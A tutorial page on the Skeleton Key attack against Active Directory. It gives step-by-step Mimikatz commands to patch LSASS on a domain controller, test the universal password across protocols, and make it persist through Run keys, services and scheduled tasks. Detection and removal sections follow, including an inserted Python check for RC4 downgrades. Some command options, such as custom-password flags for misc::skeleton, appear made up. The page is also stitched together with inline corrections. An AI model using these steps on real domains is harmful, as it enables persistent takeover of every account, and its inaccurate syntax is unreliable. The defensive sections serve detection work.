Skeleton Key Attack
LSASS manipulation for persistent authentication bypass.
Objectives
- Understand Skeleton Key attack methodology
- Learn LSASS process manipulation techniques
- Master Skeleton Key installation and usage
- Implement universal password bypass
What is a Skeleton Key Attack?
A Skeleton Key attack is a technique that modifies the LSASS (Local Security Authority Subsystem Service) process to create a backdoor password that works for any user account in the domain.
Skeleton Key Characteristics:
- Universal password: Single password works for all users
- Domain-wide persistence: Affects entire domain
- LSASS modification: Requires DC access
- Stealthy operation: Difficult to detect
How Skeleton Key Works
The Skeleton Key attack works by:
- Injecting malicious code into the LSASS process on a Domain Controller
- Modifying the authentication routine to accept a universal password
- Allowing any user to authenticate with the Skeleton Key password
- Maintaining normal authentication for legitimate users
Prerequisites for Skeleton Key Attack
To perform a Skeleton Key attack, an attacker needs:
1. Domain Controller Access
Administrative access to at least one Domain Controller in the domain.
- Local Administrator: On the DC
- Domain Admin: With DC logon rights
- Compromised DC: Through other attack vectors
2. Process Injection Capabilities
Ability to inject code into the LSASS process:
- SeDebugPrivilege: Debug privileges
- Process injection tools: Mimikatz, custom tools
- Memory manipulation: Read/write access to LSASS memory
3. Persistence Requirements
Mechanisms to maintain the Skeleton Key across reboots:
- Registry modifications: Startup persistence
- Service installation: System service persistence
- Scheduled tasks: Task scheduler persistence
Skeleton Key Installation Process
Step 1: Gain DC Access
Establish administrative access to a Domain Controller:
# Verify DC access and privileges
whoami /priv
net group "Domain Controllers" /domain
systeminfo | findstr "Domain Controller"
Step 2: Install Skeleton Key
Use Mimikatz to install the Skeleton Key:
# Using Mimikatz on Domain Controller
mimikatz # privilege::debug
mimikatz # misc::skeleton
# The default Skeleton Key password is "mimikatz"
# This can be customized during installation
Step 3: Custom Skeleton Key
Install a custom Skeleton Key with a specific password:
# Install custom Skeleton Key
mimikatz # privilege::debug
mimikatz # misc::skeleton -a "CustomPassword123"
# Verify installation
mimikatz # misc::skeleton
Testing Skeleton Key Installation
Local Testing
Test the Skeleton Key on the Domain Controller:
# Test local authentication with Skeleton Key
runas /user:administrator@corp.local cmd
# Enter the Skeleton Key password when prompted
# Test with different user accounts
runas /user:domainadmin@corp.local cmd
runas /user:serviceaccount@corp.local cmd
Remote Testing
Test the Skeleton Key from remote systems:
# Test remote authentication
net use \\dc.corp.local\C$ /user:administrator@corp.local mimikatz
# Test with different protocols
psexec \\dc.corp.local -u administrator@corp.local -p mimikatz cmd
wmic /node:dc.corp.local /user:administrator@corp.local /password:mimikatz process list
Service Authentication Testing
Test authentication to domain services:
# Test LDAP authentication
ldapsearch -H ldap://dc.corp.local -D "CN=administrator,CN=Users,DC=corp,DC=local" -w mimikatz -b "DC=corp,DC=local"
# Test Kerberos authentication
kinit administrator@corp.local
# Enter mimikatz when prompted for password
Advanced Skeleton Key Techniques
1. Multiple DC Deployment
Install Skeleton Key on multiple Domain Controllers:
# Install on primary DC
mimikatz # privilege::debug
mimikatz # misc::skeleton
# Install on secondary DC
mimikatz # privilege::debug
mimikatz # misc::skeleton
# Verify installation across DCs
mimikatz # misc::skeleton
2. Custom Authentication Routine
Modify the authentication routine for specific behavior:
# Advanced Skeleton Key with custom behavior
mimikatz # privilege::debug
mimikatz # misc::skeleton -a "CustomPass" -b "backdoor123"
# This creates multiple universal passwords
3. Persistence Mechanisms
Ensure Skeleton Key survives DC reboots:
# Registry persistence
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SkeletonKey" /t REG_SZ /d "C:\Windows\System32\mimikatz.exe misc::skeleton" /f
# Service persistence
sc create SkeletonKey binpath= "C:\Windows\System32\mimikatz.exe misc::skeleton" start= auto
sc start SkeletonKey
# Scheduled task persistence
schtasks /create /tn "SkeletonKey" /tr "C:\Windows\System32\mimikatz.exe misc::skeleton" /sc onstart /ru SYSTEM
Skeleton Key Limitations
Understanding the limitations is crucial for both attack and defense.
Technical Limitations
- DC-only operation: Only works on Domain Controllers
- Process dependency: Requires LSASS to remain running
- Memory-based: Lost on DC reboot unless persisted
- Protocol limitations: May not work with all authentication protocols
Operational Limitations
- Detection risk: Can be detected through memory analysis
- Forensic evidence: Leaves traces in memory dumps
- Performance impact: May affect DC performance
- Compatibility issues: May not work with all Windows versions
Defense Limitations
- KRBTGT rotation: Does not invalidate Skeleton Key
- Password changes: Skeleton Key remains functional
- Account lockdowns: Does not prevent Skeleton Key usage
- Network restrictions: May not prevent local authentication
Skeleton Key Detection
Detecting Skeleton Key attacks requires advanced monitoring and analysis.
Detection Methods
1. Memory Analysis
Analyze LSASS memory for Skeleton Key artifacts:
# Create LSASS memory dump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Analyze with Volatility (pslist and malfind need a full system memory image, e.g. one captured with WinPmem, not the procdump minidump above; memory.raw is a placeholder name)
volatility -f memory.raw --profile=Win10x64 pslist
volatility -f memory.raw --profile=Win10x64 malfind
# Look for Mimikatz artifacts
strings lsass.dmp | grep -i "mimikatz\|skeleton"
2. Event Log Analysis
Monitor for unusual authentication patterns:
# Skeleton Key downgrades Kerberos to RC4-HMAC: flag TGT requests (4768) whose Ticket Encryption Type is 0x17 in a domain where AES is the norm
# (a logon event never contains the password that was tried, so there is nothing to match against "mimikatz")
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768} | Where-Object {$_.Message -match "Ticket Encryption Type:\s+0x17"}
# Look for authentication anomalies: unexpected NTLM logons
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Where-Object {$_.Message -match "NTLM"}
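As an added example (not part of the original page), the RC4 downgrade check carried out over constructed 4768 records in Python: the sample lines, their flattened field layout and the account names are made up for the example, and the rule only flags accounts that previously obtained AES tickets, so a legacy RC4-only account is not reported.

```python
import re
RC4_HMAC = 0x17            # encryption type the Skeleton Key patch forces
AES_ETYPES = {0x11, 0x12}  # AES128 / AES256 CTS HMAC SHA1

# Constructed sample records (made up for this example, not real DC logs), flattened from the 4768 fields.
SAMPLE_EVENTS = """\
2024-05-01T08:00:01 4768 Account Name: jdoe Client Address: 10.0.0.15 Ticket Encryption Type: 0x12 Result Code: 0x0
2024-05-01T08:05:10 4768 Account Name: admin Client Address: 10.0.0.20 Ticket Encryption Type: 0x12 Result Code: 0x0
2024-05-01T08:07:44 4768 Account Name: svc_legacy Client Address: 10.0.0.30 Ticket Encryption Type: 0x17 Result Code: 0x0
2024-05-01T09:12:03 4768 Account Name: jdoe Client Address: 10.0.0.99 Ticket Encryption Type: 0x17 Result Code: 0x0
2024-05-01T09:12:05 4768 Account Name: admin Client Address: 10.0.0.99 Ticket Encryption Type: 0x17 Result Code: 0x18
2024-05-01T09:12:09 4768 Account Name: admin Client Address: 10.0.0.99 Ticket Encryption Type: 0x17 Result Code: 0x0
"""

_EVENT = re.compile(
    r"^(?P<time>\S+) 4768 Account Name: (?P<account>\S+) Client Address: (?P<client>\S+) "
    r"Ticket Encryption Type: (?P<etype>0x[0-9a-f]+) Result Code: (?P<result>0x[0-9a-f]+)$",
    re.IGNORECASE)

def parse_events(text):
    """Parse flattened 4768 lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = _EVENT.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["etype"] = int(ev["etype"], 16)
            ev["result"] = int(ev["result"], 16)
            events.append(ev)
    return events

def find_rc4_downgrades(events):
    """Return (account, client, time) for successful RC4 TGTs issued to accounts that earlier
    obtained AES tickets (events assumed in time order). A legacy account that always used RC4
    is not a downgrade; a failed request (non-zero Result Code) is not a Skeleton Key success."""
    seen_aes = set()
    flagged = []
    for ev in events:
        if ev["result"] != 0:
            continue
        if ev["etype"] in AES_ETYPES:
            seen_aes.add(ev["account"])
        elif ev["etype"] == RC4_HMAC and ev["account"] in seen_aes:
            flagged.append((ev["account"], ev["client"], ev["time"]))
    return flagged

if __name__ == "__main__":
    for account, client, when in find_rc4_downgrades(parse_events(SAMPLE_EVENTS)):
        print(f"{when}: RC4 TGT for {account} from {client} after earlier AES tickets")
```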
3. Process Monitoring
Monitor for LSASS process modifications (Sysmon Event ID 10, ProcessAccess, records every handle opened to lsass.exe and is the most direct signal of code injection):
# Monitor LSASS process
Get-Process lsass | Select-Object Id, ProcessName, WorkingSet
Get-WmiObject Win32_Process | Where-Object {$_.Name -eq "lsass.exe"}
# Check for suspicious DLLs loaded in LSASS
tasklist /m /fi "imagename eq lsass.exe"
4. Network Monitoring
Monitor for unusual authentication traffic:
- Kerberos anomalies: Unusual ticket requests
- NTLM patterns: Unexpected NTLM authentication
- Authentication timing: Unusual authentication timing patterns
Removing Skeleton Key
Removing a Skeleton Key requires restarting the Domain Controller, because the patch lives only in LSASS memory, and then cleaning up any persistence mechanisms that would reinstall it.
Detection and Removal Process
Step 1: Identify Skeleton Key Installation
# Check for Skeleton Key: prefer the memory and event-log checks from the Detection section
# misc::skeleton has no query mode and patches LSASS when it runs, so on a clean DC it installs the key instead of detecting it
mimikatz # misc::skeleton
Step 2: Remove Skeleton Key
# Remove Skeleton Key (requires DC reboot)
# There is no direct removal method - DC reboot is required
shutdown /r /t 0
# After reboot, verify removal with the memory and event-log checks from the Detection section
# (running misc::skeleton again would reinstall the patch rather than test for it)
Step 3: Clean Up Persistence
# Remove registry persistence
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SkeletonKey" /f
# Remove service persistence
sc stop SkeletonKey
sc delete SkeletonKey
# Remove scheduled task persistence
schtasks /delete /tn "SkeletonKey" /f
Step 4: Verify Complete Removal
# Test authentication with original passwords
runas /user:administrator@corp.local cmd
# Should prompt for actual administrator password
# Test that Skeleton Key password no longer works
runas /user:administrator@corp.local cmd
# Entering "mimikatz" should fail